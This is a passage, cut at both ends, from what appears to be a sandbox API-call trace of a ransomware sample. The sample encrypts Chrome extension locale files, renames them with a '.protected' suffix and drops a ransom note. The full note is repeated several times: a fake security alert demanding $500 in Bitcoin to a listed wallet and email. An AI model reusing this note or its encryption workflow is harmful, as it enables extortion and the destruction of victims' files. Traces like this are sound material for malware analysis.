HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json") returned 155 [0080.078] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.078] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x11a, lpOverlapped=0x0) returned 1 [0080.079] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffee6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.079] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x11a, lpOverlapped=0x0) returned 1 [0080.079] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.079] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.079] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.079] CloseHandle (hObject=0x168) returned 1 [0080.079] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.protected") returned 165 [0080.079] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.protected")) returned 1 [0080.080] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.080] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.080] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\RESTORE_FILES.txt") returned 159 [0080.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.080] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.080] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.081] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.081] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.081] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.081] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.081] CloseHandle (hObject=0x164) returned 1 [0080.081] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.081] lstrcmpiW (lpString1="hu", lpString2="Windows") returned -1 [0080.081] lstrcmpiW (lpString1="hu", lpString2="Program Files") returned -1 [0080.081] lstrcmpiW (lpString1="hu", lpString2="Program Files (x86)") returned -1 [0080.081] lstrcmpiW (lpString1="hu", lpString2="$Recycle.bin") returned 1 [0080.081] lstrcmpiW (lpString1="hu", lpString2="System Volume Information") returned -1 [0080.081] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu") returned 141 [0080.081] lstrcmpW (lpString1="hu", lpString2=".") returned 1 [0080.081] lstrcmpW (lpString1="hu", lpString2="..") returned 1 [0080.081] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\*") returned 143 [0080.081] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.081] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.081] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.081] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.081] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.081] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.081] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\.") returned 143 [0080.081] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.082] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.082] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.082] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.082] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.082] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.082] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.082] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\..") returned 144 [0080.082] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.082] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.082] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.082] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.082] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.082] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.082] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.082] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.082] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json") returned 155 [0080.082] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.082] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.082] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.082] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.082] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.082] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json") returned 155 [0080.082] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.082] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json") returned 155 [0080.082] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.082] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json") returned 155 [0080.082] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.082] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xeb, lpOverlapped=0x0) returned 1 [0080.083] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff15, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.083] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xeb, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xeb, lpOverlapped=0x0) returned 1 [0080.084] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.084] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.084] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.084] CloseHandle (hObject=0x168) returned 1 [0080.084] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.protected") returned 165 [0080.084] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.protected")) returned 1 [0080.085] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.085] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.085] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\RESTORE_FILES.txt") returned 159 [0080.085] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.085] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.085] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.086] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.086] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.086] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.086] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.086] CloseHandle (hObject=0x164) returned 1 [0080.086] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.086] lstrcmpiW (lpString1="id", lpString2="Windows") returned -1 [0080.086] lstrcmpiW (lpString1="id", lpString2="Program Files") returned -1 [0080.086] lstrcmpiW (lpString1="id", lpString2="Program Files (x86)") returned -1 [0080.086] lstrcmpiW (lpString1="id", lpString2="$Recycle.bin") returned 1 [0080.086] lstrcmpiW (lpString1="id", lpString2="System Volume Information") returned -1 [0080.086] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id") returned 141 [0080.086] lstrcmpW (lpString1="id", lpString2=".") returned 1 [0080.087] lstrcmpW (lpString1="id", lpString2="..") returned 1 [0080.087] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\*") returned 143 [0080.087] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.087] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.087] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.087] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.087] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.087] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.087] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\.") returned 143 [0080.087] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.087] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.087] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.087] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.087] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.087] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.087] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.087] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\..") returned 144 [0080.087] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.087] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.087] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.087] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.087] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.087] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.087] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.087] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.087] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json") returned 155 [0080.087] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.087] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.087] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.087] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.087] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.088] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json") returned 155 [0080.088] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.088] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json") returned 155 [0080.088] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.088] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json") returned 155 [0080.088] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.088] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd8, lpOverlapped=0x0) returned 1 [0080.089] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.089] WriteFile (in: hFile=0x168, 